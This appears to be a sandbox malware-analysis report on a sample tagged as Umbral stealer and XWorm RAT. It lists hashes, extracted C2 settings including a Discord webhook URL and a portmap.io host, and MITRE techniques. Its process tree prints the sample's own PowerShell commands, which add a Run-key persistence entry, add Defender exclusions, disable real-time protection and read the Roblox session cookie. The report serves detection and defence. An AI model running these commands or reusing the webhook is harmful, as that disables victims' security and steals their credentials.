umbral | 932efb570cd8045499675443a910394b5c6bec45511aa2c517a636bd3e385766

Analysis

max time kernel
131s
max time network
159s
platform
windows10-1703_x64
resource
win10-20240221-en
resource tags

arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system
submitted
25-02-2024 06:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

IO tootls.exe
Size

209KB
MD5

841d1c344cc00671b25a80e6db3b1e06
SHA1

1952391bfc777b4cd2acc403d895dd7e198aa013
SHA256

932efb570cd8045499675443a910394b5c6bec45511aa2c517a636bd3e385766
SHA512

75af1637e76c307c6241a4ac26859a9260c2198d2aa83e5a6c52e0ec6bb37fac4cecf4f002f05d861356f833fc306869682e3195c0e6ba603e8ebf4b9a98f96e
SSDEEP

6144:v5DmisKDLvohc1Y3o40bbwhpn8+jPmqSQj33zO9Y:xXLDor440y8oPmZW

Score

10^/10

umbral xworm persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

hai1723rat-60039.portmap.io:60039

Extracted

Family

umbral

https://discord.com/api/webhooks/1211176678466916392/99VOwP9dc7iQz2Is-QlZ872KZaiUa4r3sEvXqZ6NmS-fFuTojiUjOg2SjIUWBCIoPNFA

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral3/memory/1956-51-0x0000025619580000-0x00000256195CE000-memory.dmp	family_umbral
behavioral3/files/0x000700000001abfd-49.dat	family_umbral

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral3/files/0x000700000001abfa-43.dat	family_xworm
behavioral3/memory/4528-45-0x0000000000E60000-0x0000000000E86000-memory.dmp	family_xworm

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	controllloader.exe

Executes dropped EXE 2 IoCs

pid	Process
4528	systemload.exe
1956	controllloader.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1903027113-674645041-2759338396-1000\Software\Microsoft\Windows\CurrentVersion\Run\updatee = "C:\\Windows\\.NET\\netloader.exe"	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
12	discord.com
13	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com
8	ip-api.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2720 set thread context of 192	2720	IO tootls.exe	74

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\.NET\netloader.exe	IO tootls.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1228	wmic.exe

Suspicious behavior: EnumeratesProcesses 43 IoCs

pid	Process
212	powershell.exe
212	powershell.exe
192	IO tootls.exe
192	IO tootls.exe
192	IO tootls.exe
192	IO tootls.exe
192	IO tootls.exe
192	IO tootls.exe
192	IO tootls.exe
192	IO tootls.exe
192	IO tootls.exe
192	IO tootls.exe
192	IO tootls.exe
192	IO tootls.exe
192	IO tootls.exe
192	IO tootls.exe
192	IO tootls.exe
212	powershell.exe
4560	powershell.exe
4552	powershell.exe
4560	powershell.exe
4552	powershell.exe
4560	powershell.exe
4552	powershell.exe
4720	powershell.exe
4720	powershell.exe
4720	powershell.exe
3256	powershell.exe
4344	powershell.exe
4344	powershell.exe
3256	powershell.exe
4344	powershell.exe
3256	powershell.exe
4528	systemload.exe
2068	powershell.exe
2068	powershell.exe
2068	powershell.exe
2612	powershell.exe
2612	powershell.exe
2612	powershell.exe
4556	powershell.exe
4556	powershell.exe
4556	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	212	powershell.exe
Token: SeDebugPrivilege	192	IO tootls.exe
Token: SeDebugPrivilege	1956	controllloader.exe
Token: SeDebugPrivilege	4560	powershell.exe
Token: SeDebugPrivilege	4552	powershell.exe
Token: SeDebugPrivilege	4528	systemload.exe
Token: SeDebugPrivilege	4720	powershell.exe
Token: SeIncreaseQuotaPrivilege	4552	powershell.exe
Token: SeSecurityPrivilege	4552	powershell.exe
Token: SeTakeOwnershipPrivilege	4552	powershell.exe
Token: SeLoadDriverPrivilege	4552	powershell.exe
Token: SeSystemProfilePrivilege	4552	powershell.exe
Token: SeSystemtimePrivilege	4552	powershell.exe
Token: SeProfSingleProcessPrivilege	4552	powershell.exe
Token: SeIncBasePriorityPrivilege	4552	powershell.exe
Token: SeCreatePagefilePrivilege	4552	powershell.exe
Token: SeBackupPrivilege	4552	powershell.exe
Token: SeRestorePrivilege	4552	powershell.exe
Token: SeShutdownPrivilege	4552	powershell.exe
Token: SeDebugPrivilege	4552	powershell.exe
Token: SeSystemEnvironmentPrivilege	4552	powershell.exe
Token: SeRemoteShutdownPrivilege	4552	powershell.exe
Token: SeUndockPrivilege	4552	powershell.exe
Token: SeManageVolumePrivilege	4552	powershell.exe
Token: 33	4552	powershell.exe
Token: 34	4552	powershell.exe
Token: 35	4552	powershell.exe
Token: 36	4552	powershell.exe
Token: SeIncreaseQuotaPrivilege	4720	powershell.exe
Token: SeSecurityPrivilege	4720	powershell.exe
Token: SeTakeOwnershipPrivilege	4720	powershell.exe
Token: SeLoadDriverPrivilege	4720	powershell.exe
Token: SeSystemProfilePrivilege	4720	powershell.exe
Token: SeSystemtimePrivilege	4720	powershell.exe
Token: SeProfSingleProcessPrivilege	4720	powershell.exe
Token: SeIncBasePriorityPrivilege	4720	powershell.exe
Token: SeCreatePagefilePrivilege	4720	powershell.exe
Token: SeBackupPrivilege	4720	powershell.exe
Token: SeRestorePrivilege	4720	powershell.exe
Token: SeShutdownPrivilege	4720	powershell.exe
Token: SeDebugPrivilege	4720	powershell.exe
Token: SeSystemEnvironmentPrivilege	4720	powershell.exe
Token: SeRemoteShutdownPrivilege	4720	powershell.exe
Token: SeUndockPrivilege	4720	powershell.exe
Token: SeManageVolumePrivilege	4720	powershell.exe
Token: 33	4720	powershell.exe
Token: 34	4720	powershell.exe
Token: 35	4720	powershell.exe
Token: 36	4720	powershell.exe
Token: SeDebugPrivilege	3256	powershell.exe
Token: SeDebugPrivilege	4344	powershell.exe
Token: SeIncreaseQuotaPrivilege	4344	powershell.exe
Token: SeSecurityPrivilege	4344	powershell.exe
Token: SeTakeOwnershipPrivilege	4344	powershell.exe
Token: SeLoadDriverPrivilege	4344	powershell.exe
Token: SeSystemProfilePrivilege	4344	powershell.exe
Token: SeSystemtimePrivilege	4344	powershell.exe
Token: SeProfSingleProcessPrivilege	4344	powershell.exe
Token: SeIncBasePriorityPrivilege	4344	powershell.exe
Token: SeCreatePagefilePrivilege	4344	powershell.exe
Token: SeBackupPrivilege	4344	powershell.exe
Token: SeRestorePrivilege	4344	powershell.exe
Token: SeShutdownPrivilege	4344	powershell.exe
Token: SeDebugPrivilege	4344	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4528	systemload.exe

Suspicious use of WriteProcessMemory 43 IoCs

description	pid	Process	procid_target
PID 2720 wrote to memory of 212	2720	IO tootls.exe	72
PID 2720 wrote to memory of 212	2720	IO tootls.exe	72
PID 2720 wrote to memory of 212	2720	IO tootls.exe	72
PID 2720 wrote to memory of 192	2720	IO tootls.exe	74
PID 2720 wrote to memory of 192	2720	IO tootls.exe	74
PID 2720 wrote to memory of 192	2720	IO tootls.exe	74
PID 2720 wrote to memory of 192	2720	IO tootls.exe	74
PID 2720 wrote to memory of 192	2720	IO tootls.exe	74
PID 2720 wrote to memory of 192	2720	IO tootls.exe	74
PID 2720 wrote to memory of 192	2720	IO tootls.exe	74
PID 2720 wrote to memory of 192	2720	IO tootls.exe	74
PID 192 wrote to memory of 4528	192	IO tootls.exe	76
PID 192 wrote to memory of 4528	192	IO tootls.exe	76
PID 192 wrote to memory of 1956	192	IO tootls.exe	77
PID 192 wrote to memory of 1956	192	IO tootls.exe	77
PID 192 wrote to memory of 4628	192	IO tootls.exe	78
PID 192 wrote to memory of 4628	192	IO tootls.exe	78
PID 192 wrote to memory of 4628	192	IO tootls.exe	78
PID 4628 wrote to memory of 4560	4628	cmd.exe	80
PID 4628 wrote to memory of 4560	4628	cmd.exe	80
PID 4628 wrote to memory of 4560	4628	cmd.exe	80
PID 1956 wrote to memory of 4552	1956	controllloader.exe	81
PID 1956 wrote to memory of 4552	1956	controllloader.exe	81
PID 4528 wrote to memory of 4720	4528	systemload.exe	83
PID 4528 wrote to memory of 4720	4528	systemload.exe	83
PID 1956 wrote to memory of 3256	1956	controllloader.exe	88
PID 1956 wrote to memory of 3256	1956	controllloader.exe	88
PID 4528 wrote to memory of 4344	4528	systemload.exe	87
PID 4528 wrote to memory of 4344	4528	systemload.exe	87
PID 1956 wrote to memory of 2068	1956	controllloader.exe	91
PID 1956 wrote to memory of 2068	1956	controllloader.exe	91
PID 1956 wrote to memory of 2612	1956	controllloader.exe	92
PID 1956 wrote to memory of 2612	1956	controllloader.exe	92
PID 1956 wrote to memory of 4368	1956	controllloader.exe	94
PID 1956 wrote to memory of 4368	1956	controllloader.exe	94
PID 1956 wrote to memory of 2236	1956	controllloader.exe	96
PID 1956 wrote to memory of 2236	1956	controllloader.exe	96
PID 1956 wrote to memory of 4904	1956	controllloader.exe	98
PID 1956 wrote to memory of 4904	1956	controllloader.exe	98
PID 1956 wrote to memory of 4556	1956	controllloader.exe	100
PID 1956 wrote to memory of 4556	1956	controllloader.exe	100
PID 1956 wrote to memory of 1228	1956	controllloader.exe	102
PID 1956 wrote to memory of 1228	1956	controllloader.exe	102

C:\Users\Admin\AppData\Local\Temp\IO tootls.exe
"C:\Users\Admin\AppData\Local\Temp\IO tootls.exe"
1⤵
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2720
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'updatee';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'updatee' -Value '"C:\Windows\.NET\netloader.exe"' -PropertyType 'String'
  2⤵
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:212
- C:\Users\Admin\AppData\Local\Temp\IO tootls.exe
  #cmd
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:192
- - C:\Users\Admin\AppData\Local\Temp\systemload.exe
    "C:\Users\Admin\AppData\Local\Temp\systemload.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:4528
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\systemload.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4720
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'systemload.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4344
- - C:\Users\Admin\AppData\Local\Temp\controllloader.exe
    "C:\Users\Admin\AppData\Local\Temp\controllloader.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1956
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\controllloader.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4552
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3256
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2068
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2612
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      4⤵
      PID:4368
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      4⤵
      PID:2236
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:4904
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4556
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1228
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\start.cmd" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4628
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\'"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4560

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\IO tootls.exe.log

Filesize
321B

MD5
d96cb6a55eb71b30f2e8a725ef5e6e5d

SHA1
f0bef03d7f37dfee965c6dfe4f6f447e3ab34be0

SHA256
253f84939770e1b5663cecd7df61bb04c1668c1a5f90a6dd2b95ea6830f8977b

SHA512
e65e8ee91233d4179beff6d381c07a600a0905710feaa063d9880c48646bd296137efdf628caecb8ccecec20162c2c952e9713d1d629788a37f1afba09bf4b77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
e4986f280beef3551f86ea8a128dafbe

SHA1
a0f0407243cd96b2e235364a4c0b129a1efe50bb

SHA256
102c39115a6b0871e76af2deb4d461f6b65fe341310d4ea0b8ff8c11c27c8b17

SHA512
deb760a3f6fd4a5646bbe8aa9d54b22483fc1365387fa331e17d6f18945adc71798975d09d5ac4903a1216bb4795e830baa9103b1f522ef6f11f9e8b96bf2028

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3df03b7292eeda72e97180e347b03cf3

SHA1
6dcf07eba6cbefa06b5ca7cc458e2e87d18fb750

SHA256
a3b2aa06d843fcb2399f1d529737e59b2beeb20519bd80035c2033dac646a52f

SHA512
1d458b231c87f3a70031284430a63553e2739e9bd406d8a04a4f9d9b19ab4f97b4e785b41e2e530321767e8d7f6c12c2299078335491dfb205669f749ab29cb6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d851daf7e776ced4cc313b8640d132fe

SHA1
e7b54a3fd5928ec72982e2328cb317856111f83c

SHA256
c671cada8e8412a202e284881abeea5ead0b7b0a74e114736670152736feaa71

SHA512
80a053e42cdb01779076a233bbdf6f2badffcb8e19448d6c0974b8cfd1d12c3bc605b01df21347c5dafacffcc80a23076e9d20c00089064f73b529b9447c61cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
f714c10341c848faaf6685bcc79fb5ea

SHA1
5013be20895bba7b59a5d95c8d9ae23b3dd11d49

SHA256
6087b893665c0282685a116f416a999efc3df89b30ad1b485ea698943e9ef93b

SHA512
146bfdd68ac348289fbd734074d9ae3180bd6e1c693d03642753f9d03501327b5129e788e65968309614e9537e96bd4d623f1b6f46d2071abe338cfffadd4c8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b0bc4f5ac16fb9edcb4d4849add18c34

SHA1
eb1962287dcdc710ffb4c8b2d534d77f0de78f4b

SHA256
b9379602a9eb5b7255995dfd60b79f2f8237b41fb62b9e1ed3b433d72863489f

SHA512
f822a03cf89547142213db6dfbb2133c868db4664ffb56c293769cb880e791f8d2876a08b6846dbdd66800d01d9d50b81301f45116de5aa8fa6fb0e4b16daeec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a6e09ef9fe59edcf0752162d821f27e0

SHA1
585bbd29d946b09552db5e9ee7b22725a39550a5

SHA256
18fefdbd3470ae3bb3e24453b09faf13b77b7273c54499f9613aa912b1c5796f

SHA512
cb24a43065cd7f0c28aae7117b43e4b32d36b4ddb6034937fd8afd9e8984e06816273338b200d8a6071028a1c5c03d460bdc947afd452bf1f7241a08b6244eb4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
85c837fe1872fdc34feafa89e91d937e

SHA1
59d764667ce4ef3035d1af8afa63ad3ad73b7dc8

SHA256
28d04dffd11801021d91e62d9a8cd62493a316b8db941636d7751fd09466ea31

SHA512
2d1c9912a3c28408956f7c6f434edab19587a8e92d5f445baa1761fb639aecbcb16980f6a090bc57bb5da0d046eb3a2f105be25a8729a11d4ecd1c086ac71564

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m40qdhwh.uu5.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\controllloader.exe

Filesize
286KB

MD5
e41a0fa0c1e39af92d22090d4df61a1f

SHA1
c971a4089b1ab116c34b5ab0dc54d9977f86e834

SHA256
c0966533c2bc8c8b9ee176d774eae0ca1c4d6fe6e8efe5d87d4cac8c04b84372

SHA512
d42798fa9115f3c3775798a26ef7c28e4f173bdc2b74884b01a4e7905b17a2da09508766a626652eec3622a15a891b6859f4e9a422eb052a59b3fd3eafe1a7fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\start.cmd

Filesize
93B

MD5
f960abd9684a879e8eca03b8c864ea96

SHA1
fb4b9a9b40af84ae46b70bb40ac3e1f45e4b4ad3

SHA256
7389178da21f4e2d4ef73ab199b7beeb97247a6c1afec3f3c48a7f561cbfaf90

SHA512
2c6267ab25c364c5b13059ed593bb47dfae586ae7b1411634efa3f45aaf07b4d8f491fe93bfd34482a1250c955f1e8c27e1afa0460672a5e9584ebe007ab2054

Download Submit
C:\Users\Admin\AppData\Local\Temp\systemload.exe

Filesize
130KB

MD5
352a162df9ca5605e1a1910c7a24cb7c

SHA1
4b4ed1c740a03c15eb47d875b65c76941debcaf7

SHA256
87e9d9a7a197a0cd483f8e73f307af53a7518cabc001257c8235743181b9a7b8

SHA512
0c2bae3f66748cc3448eaf60c5079ae3afba6d585e19e54857f7c152a1bd69c3b8e3df7feb413f3eb2df0f2bc01b44be5bcdefd5427af154a221f2b808a2399d

Download Submit
memory/192-15-0x00000000737E0000-0x0000000073ECE000-memory.dmp

Filesize
6.9MB

Download
memory/192-10-0x0000000005430000-0x00000000054CC000-memory.dmp

Filesize
624KB

Download
memory/192-6-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/192-18-0x00000000054D0000-0x0000000005536000-memory.dmp

Filesize
408KB

Download
memory/192-19-0x0000000005670000-0x0000000005680000-memory.dmp

Filesize
64KB

Download
memory/192-56-0x00000000737E0000-0x0000000073ECE000-memory.dmp

Filesize
6.9MB

Download
memory/212-81-0x0000000070160000-0x00000000701AB000-memory.dmp

Filesize
300KB

Download
memory/212-14-0x0000000006530000-0x0000000006540000-memory.dmp

Filesize
64KB

Download
memory/212-25-0x0000000007C90000-0x0000000007D06000-memory.dmp

Filesize
472KB

Download
memory/212-23-0x0000000007540000-0x000000000755C000-memory.dmp

Filesize
112KB

Download
memory/212-22-0x00000000075C0000-0x0000000007910000-memory.dmp

Filesize
3.3MB

Download
memory/212-576-0x0000000006830000-0x000000000684A000-memory.dmp

Filesize
104KB

Download
memory/212-92-0x0000000006530000-0x0000000006540000-memory.dmp

Filesize
64KB

Download
memory/212-21-0x00000000072D0000-0x0000000007336000-memory.dmp

Filesize
408KB

Download
memory/212-93-0x0000000009090000-0x0000000009124000-memory.dmp

Filesize
592KB

Download
memory/212-20-0x0000000007230000-0x0000000007252000-memory.dmp

Filesize
136KB

Download
memory/212-91-0x0000000006530000-0x0000000006540000-memory.dmp

Filesize
64KB

Download
memory/212-88-0x0000000008EB0000-0x0000000008F55000-memory.dmp

Filesize
660KB

Download
memory/212-17-0x0000000006BB0000-0x00000000071D8000-memory.dmp

Filesize
6.2MB

Download
memory/212-16-0x0000000006530000-0x0000000006540000-memory.dmp

Filesize
64KB

Download
memory/212-11-0x00000000737E0000-0x0000000073ECE000-memory.dmp

Filesize
6.9MB

Download
memory/212-13-0x0000000006540000-0x0000000006576000-memory.dmp

Filesize
216KB

Download
memory/212-70-0x00000000737E0000-0x0000000073ECE000-memory.dmp

Filesize
6.9MB

Download
memory/212-24-0x00000000079D0000-0x0000000007A1B000-memory.dmp

Filesize
300KB

Download
memory/212-78-0x0000000008D70000-0x0000000008DA3000-memory.dmp

Filesize
204KB

Download
memory/212-79-0x0000000006530000-0x0000000006540000-memory.dmp

Filesize
64KB

Download
memory/212-82-0x0000000008D50000-0x0000000008D6E000-memory.dmp

Filesize
120KB

Download
memory/212-80-0x000000007E520000-0x000000007E530000-memory.dmp

Filesize
64KB

Download
memory/1956-59-0x0000025633BD0000-0x0000025633BE0000-memory.dmp

Filesize
64KB

Download
memory/1956-57-0x00007FF9AD100000-0x00007FF9ADAEC000-memory.dmp

Filesize
9.9MB

Download
memory/1956-140-0x00007FF9AD100000-0x00007FF9ADAEC000-memory.dmp

Filesize
9.9MB

Download
memory/1956-51-0x0000025619580000-0x00000256195CE000-memory.dmp

Filesize
312KB

Download
memory/1956-183-0x0000025633BD0000-0x0000025633BE0000-memory.dmp

Filesize
64KB

Download
memory/2720-1-0x00000000737E0000-0x0000000073ECE000-memory.dmp

Filesize
6.9MB

Download
memory/2720-4-0x0000000005030000-0x0000000005040000-memory.dmp

Filesize
64KB

Download
memory/2720-12-0x00000000737E0000-0x0000000073ECE000-memory.dmp

Filesize
6.9MB

Download
memory/2720-0-0x0000000000800000-0x000000000083A000-memory.dmp

Filesize
232KB

Download
memory/2720-2-0x00000000054A0000-0x000000000599E000-memory.dmp

Filesize
5.0MB

Download
memory/4528-54-0x00007FF9AD100000-0x00007FF9ADAEC000-memory.dmp

Filesize
9.9MB

Download
memory/4528-45-0x0000000000E60000-0x0000000000E86000-memory.dmp

Filesize
152KB

Download
memory/4528-115-0x00007FF9AD100000-0x00007FF9ADAEC000-memory.dmp

Filesize
9.9MB

Download
memory/4552-76-0x000001B751A40000-0x000001B751A50000-memory.dmp

Filesize
64KB

Download
memory/4552-300-0x000001B751A40000-0x000001B751A50000-memory.dmp

Filesize
64KB

Download
memory/4552-75-0x00007FF9AD100000-0x00007FF9ADAEC000-memory.dmp

Filesize
9.9MB

Download
memory/4552-77-0x000001B751A40000-0x000001B751A50000-memory.dmp

Filesize
64KB

Download
memory/4552-83-0x000001B751B50000-0x000001B751B72000-memory.dmp

Filesize
136KB

Download
memory/4552-94-0x000001B751D00000-0x000001B751D76000-memory.dmp

Filesize
472KB

Download
memory/4552-143-0x000001B751A40000-0x000001B751A50000-memory.dmp

Filesize
64KB

Download
memory/4552-580-0x00007FF9AD100000-0x00007FF9ADAEC000-memory.dmp

Filesize
9.9MB

Download
memory/4552-302-0x000001B751A40000-0x000001B751A50000-memory.dmp

Filesize
64KB

Download
memory/4552-270-0x00007FF9AD100000-0x00007FF9ADAEC000-memory.dmp

Filesize
9.9MB

Download
memory/4560-205-0x0000000000C20000-0x0000000000C30000-memory.dmp

Filesize
64KB

Download
memory/4560-184-0x0000000070160000-0x00000000701AB000-memory.dmp

Filesize
300KB

Download
memory/4560-262-0x0000000000C20000-0x0000000000C30000-memory.dmp

Filesize
64KB

Download
memory/4560-63-0x00000000737E0000-0x0000000073ECE000-memory.dmp

Filesize
6.9MB

Download
memory/4560-64-0x0000000000C20000-0x0000000000C30000-memory.dmp

Filesize
64KB

Download
memory/4560-207-0x0000000000C20000-0x0000000000C30000-memory.dmp

Filesize
64KB

Download
memory/4560-65-0x0000000000C20000-0x0000000000C30000-memory.dmp

Filesize
64KB

Download
memory/4560-191-0x000000007F8E0000-0x000000007F8F0000-memory.dmp

Filesize
64KB

Download
memory/4560-187-0x00000000737E0000-0x0000000073ECE000-memory.dmp

Filesize
6.9MB

Download
memory/4720-125-0x0000022C43DE0000-0x0000022C43DF0000-memory.dmp

Filesize
64KB

Download
memory/4720-129-0x0000022C43DE0000-0x0000022C43DF0000-memory.dmp

Filesize
64KB

Download
memory/4720-120-0x00007FF9AD100000-0x00007FF9ADAEC000-memory.dmp

Filesize
9.9MB

Download
memory/4720-272-0x0000022C43DE0000-0x0000022C43DF0000-memory.dmp

Filesize
64KB

Download
memory/4720-338-0x0000022C43DE0000-0x0000022C43DF0000-memory.dmp

Filesize
64KB

Download